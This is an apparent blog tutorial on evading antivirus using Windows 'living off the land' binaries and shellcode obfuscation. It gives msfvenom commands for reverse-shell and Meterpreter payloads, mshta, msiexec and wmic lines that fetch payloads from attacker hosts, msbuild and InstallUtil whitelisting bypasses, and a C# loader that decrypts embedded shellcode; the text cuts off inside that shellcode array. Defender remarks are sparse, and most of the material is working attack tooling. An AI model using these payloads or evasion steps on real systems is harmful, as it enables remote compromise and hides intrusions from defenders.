&lt;p&gt;The underlying idea of "&lt;strong&gt;Living Off the Land&lt;/strong&gt;" was presented by Christopher Campbell and Matt Graeber at the DerbyCon security conference in 2013; the term "LOLBins" (&lt;strong&gt;Living-Off-the-Land Binaries&lt;/strong&gt;) itself was coined later by Philip Goh. In essence, these are trusted, typically Microsoft-signed system binaries that can be repurposed to download, execute or proxy attacker-controlled code. Consider the following examples:&lt;/p&gt;

&lt;h4&gt;
  
  
  DarkHydrus APT Sample
&lt;/h4&gt;

&lt;p&gt;MD5: B108412F1CDC0602D82D3E6B318DC634&lt;/p&gt;

&lt;p&gt;Launch command employed:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="nb"&gt;cscript.exe&lt;/span&gt; &lt;span class="s2"&gt;"C:\Users\Public\Documents\OfficeUpdateService.vbs"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This example utilises &lt;code&gt;cscript&lt;/code&gt; to execute a VBS script that establishes persistence via a startup entry. From a defender's perspective, a script host launched against a file under &lt;code&gt;C:\Users\Public\&lt;/code&gt;—a directory writable by every local user—is a low-noise detection pivot in its own right, independent of what the script does.&lt;/p&gt;

&lt;h4&gt;
  
  
  Mshta:
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;payload:
msfvenom &lt;span class="nt"&gt;-a&lt;/span&gt; x86 &lt;span class="nt"&gt;--platform&lt;/span&gt; windows &lt;span class="nt"&gt;-p&lt;/span&gt; windows/meterpreter/reverse_tcp &lt;span class="nv"&gt;LHOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.174.134 &lt;span class="nv"&gt;LPORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;53 &lt;span class="nt"&gt;-f&lt;/span&gt; raw &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; shellcode.bin

&lt;span class="nb"&gt;cat &lt;/span&gt;shellcode.bin |base64 &lt;span class="nt"&gt;-w&lt;/span&gt; 0

mshta.exe http://192.168.174.134/qing.hta
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Template (replace the shellcode at the designated location with the base64 string produced above; the &lt;code&gt;-a x86&lt;/code&gt; in the payload command is deliberate, as this template's stager runs 32-bit shellcode—an x64 payload will crash it):&lt;br&gt;
&lt;a href="https://raw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta" rel="noopener noreferrer"&gt;https://raw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta&lt;/a&gt;&lt;/p&gt;


  &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fc8nltcajane075bucshj.png" alt="Figure 11: CACTUSTORCH.hta shellcode replacement location" width="798" height="163"&gt;Figure 11: CACTUSTORCH.hta shellcode replacement location
  

&lt;h4&gt;
  
  
  Msiexec:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;msfvenom &lt;span class="nt"&gt;-p&lt;/span&gt; windows/x64/shell/reverse_tcp &lt;span class="nv"&gt;LHOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.174.134 &lt;span class="nv"&gt;LPORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;4444 - f msi &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; qing.txt

C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\S&lt;/span&gt;ystem32&lt;span class="se"&gt;\m&lt;/span&gt;siexec.exe /q /i http://192.168.174.134 /qing.txt

&lt;span class="c"&gt;# Loading DLL:&lt;/span&gt;
msfvenom &lt;span class="nt"&gt;-p&lt;/span&gt; windows/x64/shell/reverse_tcp &lt;span class="nv"&gt;LHOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.174.134 &lt;span class="nv"&gt;LPORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;53 - f dll &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; qing.dll

msiexec /y C:&lt;span class="se"&gt;\q&lt;/span&gt;ing.dll
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  Msbuild:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework&lt;span class="se"&gt;\v&lt;/span&gt;4.0.30319&lt;span class="se"&gt;\m&lt;/span&gt;sbuild.exe qing.xml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Template (courtesy of 3gstudent):&lt;br&gt;
&lt;a href="https://github.com/3gstudent/msbuild-inline-task" rel="noopener noreferrer"&gt;https://github.com/3gstudent/msbuild-inline-task&lt;/a&gt;&lt;/p&gt;


  &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F9sr4sjmpyzzydskuth27.png" alt="Figure 12: MSBuild inline task template" width="800" height="441"&gt;Figure 12: MSBuild inline task template
  

&lt;h4&gt;
  
  
  Installutil:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Compile:&lt;/span&gt;
C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework64&lt;span class="se"&gt;\v&lt;/span&gt;4.0.30319&lt;span class="se"&gt;\c&lt;/span&gt;sc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:qing.exe /keyfile:C:&lt;span class="se"&gt;\U&lt;/span&gt;sers&lt;span class="se"&gt;\J&lt;/span&gt;ohn&lt;span class="se"&gt;\D&lt;/span&gt;esktop&lt;span class="se"&gt;\i&lt;/span&gt;nstallutil.snk /unsafe C:&lt;span class="se"&gt;\U&lt;/span&gt;sers&lt;span class="se"&gt;\J&lt;/span&gt;ohn&lt;span class="se"&gt;\D&lt;/span&gt;esktop&lt;span class="se"&gt;\i&lt;/span&gt;nstallutil.cs

&lt;span class="c"&gt;# Execute:&lt;/span&gt;
C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework64&lt;span class="se"&gt;\v&lt;/span&gt;4.0.30319&lt;span class="se"&gt;\I&lt;/span&gt;nstallUtil.exe /logfile&lt;span class="o"&gt;=&lt;/span&gt; /LogToConsole&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;false&lt;/span&gt; /U qing.exe

&lt;span class="c"&gt;# Details:&lt;/span&gt;
https://www.blackhillsinfosec.com/how-to-bypass-application-whitelisting-av/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  Wmic:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;wmic os get /FORMAT:&lt;span class="s2"&gt;"http://example.com/evil.xsl"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Template (remote XSL script processing via &lt;code&gt;/FORMAT&lt;/code&gt;; note that &lt;code&gt;wmic.exe&lt;/code&gt; is deprecated and is no longer installed by default on current Windows 11 builds, so confirm it exists on the target before relying on it):&lt;br&gt;
&lt;a href="https://raw.githubusercontent.com/kmkz/Sources/master/wmic-poc.xsl" rel="noopener noreferrer"&gt;https://raw.githubusercontent.com/kmkz/Sources/master/wmic-poc.xsl&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  Csc:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;msfvenom &lt;span class="nt"&gt;-p&lt;/span&gt; windows/x64/shell/reverse_tcp &lt;span class="nv"&gt;LHOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.174.132 &lt;span class="nv"&gt;LPORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;53 - f csharp

C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework&lt;span class="se"&gt;\v&lt;/span&gt;2.0.50727&lt;span class="se"&gt;\c&lt;/span&gt;sc.exe /unsafe /platform:x86 /out:D:&lt;span class="se"&gt;\t&lt;/span&gt;est&lt;span class="se"&gt;\I&lt;/span&gt;nstallUtil-shell.exe D:&lt;span class="se"&gt;\t&lt;/span&gt;est&lt;span class="se"&gt;\I&lt;/span&gt;nstallUtil-ShellCode.cs
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Subsequent execution can be performed via Installutil. Note the architecture mismatch in the listing above: the shellcode is generated for &lt;code&gt;windows/x64&lt;/code&gt;, yet it is compiled with the 32-bit Framework &lt;code&gt;csc.exe&lt;/code&gt; and &lt;code&gt;/platform:x86&lt;/code&gt;. The shellcode's architecture must match the process that will execute it, so either generate x86 shellcode or build and run the assembly as x64 (using the &lt;code&gt;Framework64&lt;/code&gt; tools as in the Installutil example).&lt;/p&gt;



&lt;p&gt;I shall refrain from enumerating further whitelist exploitation techniques, as the underlying principle remains consistent across different binaries.&lt;/p&gt;

&lt;p&gt;A pertinent question arises: in certain scenarios, the executables or DLLs generated from our shellcode may still be &lt;strong&gt;written to disk&lt;/strong&gt; when employing these techniques.&lt;/p&gt;

&lt;p&gt;Although the aforementioned in-memory loading methods can mitigate this issue, what if &lt;strong&gt;file system persistence is a mandatory requirement&lt;/strong&gt;? How can one evade detection in such cases?&lt;/p&gt;

&lt;p&gt;This brings us to the second major category of evasion techniques: &lt;strong&gt;Obfuscation&lt;/strong&gt;.&lt;/p&gt;


&lt;h2&gt;
  
  
  0x02 Shellcode "Obfuscation" Evasion
&lt;/h2&gt;

&lt;p&gt;Is it possible to apply the same &lt;strong&gt;obfuscation, encryption, and fragmentation&lt;/strong&gt; techniques used for PHP web shells to shellcode?&lt;/p&gt;

&lt;p&gt;Let us begin with the simplest examples.&lt;/p&gt;
&lt;h3&gt;
  
  
  A) Shellcode Encoding Obfuscation
&lt;/h3&gt;

&lt;p&gt;After XOR-encoding the shellcode, memory is allocated for execution—a process fundamentally similar to the shellcode execution method described at the beginning of this article. Be clear about what this buys: XOR with a static key is obfuscation, not encryption. It defeats static signatures on the stored bytes, but the key ships inside the binary and the decoded shellcode is plaintext in memory the moment it runs, so it offers nothing against memory scanning or behavioural detection.&lt;/p&gt;
&lt;h4&gt;
  
  
  C# XOR Example (ShellcodeWrapper):
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight csharp"&gt;&lt;code&gt;&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.IO&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Collections.Generic&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Text&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Threading.Tasks&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Security.Cryptography&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Runtime.InteropServices&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;namespace&lt;/span&gt; &lt;span class="nn"&gt;RunShellCode&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;Program&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c1"&gt;//==============================================================================&lt;/span&gt;
        &lt;span class="c1"&gt;// CRYPTO FUNCTIONS&lt;/span&gt;
        &lt;span class="c1"&gt;//==============================================================================&lt;/span&gt;
        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;T&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SubArray&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;T&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;(&lt;/span&gt;&lt;span class="k"&gt;this&lt;/span&gt; &lt;span class="n"&gt;T&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;index&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;T&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="n"&gt;T&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
            &lt;span class="n"&gt;Array&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Copy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;index&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="nf"&gt;xor&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;decrypted&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

            &lt;span class="k"&gt;for&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;++)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;decrypted&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;^&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="p"&gt;%&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;

            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;decrypted&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="c1"&gt;//--------------------------------------------------------------------------------------------------&lt;/span&gt;
        &lt;span class="c1"&gt;// Decrypts the given a plaintext message byte array with a given 128 bits key&lt;/span&gt;
        &lt;span class="c1"&gt;// Returns the unencrypted message&lt;/span&gt;
        &lt;span class="c1"&gt;//--------------------------------------------------------------------------------------------------&lt;/span&gt;
        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="nf"&gt;aesDecrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="kt"&gt;var&lt;/span&gt; &lt;span class="n"&gt;IV&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;SubArray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;16&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="kt"&gt;var&lt;/span&gt; &lt;span class="n"&gt;encryptedMessage&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;SubArray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;16&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt; &lt;span class="m"&gt;16&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

            &lt;span class="c1"&gt;// Create an AesManaged object with the specified key and IV.&lt;/span&gt;
            &lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;AesManaged&lt;/span&gt; &lt;span class="n"&gt;aes&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nf"&gt;AesManaged&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
            &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;aes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Padding&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;PaddingMode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;PKCS7&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="n"&gt;aes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;KeySize&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;128&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="n"&gt;aes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Key&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="n"&gt;aes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IV&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;IV&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

                &lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;MemoryStream&lt;/span&gt; &lt;span class="n"&gt;ms&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nf"&gt;MemoryStream&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
                &lt;span class="p"&gt;{&lt;/span&gt;
                    &lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;CryptoStream&lt;/span&gt; &lt;span class="n"&gt;cs&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nf"&gt;CryptoStream&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ms&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;aes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;CreateDecryptor&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="n"&gt;CryptoStreamMode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
                    &lt;span class="p"&gt;{&lt;/span&gt;
                        &lt;span class="n"&gt;cs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;encryptedMessage&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;encryptedMessage&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                    &lt;span class="p"&gt;}&lt;/span&gt;

                    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ms&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;ToArray&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
                &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="c1"&gt;//==============================================================================&lt;/span&gt;
        &lt;span class="c1"&gt;// MAIN FUNCTION&lt;/span&gt;
        &lt;span class="c1"&gt;//==============================================================================&lt;/span&gt;
        &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;Main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;encryptedShellcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="m"&gt;0x8d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x81&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xec&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x67&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x71&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x69&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xee&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x94&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xae&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x03&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xfa&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x39&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xec&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x23&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x65&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x35&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x65&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span 
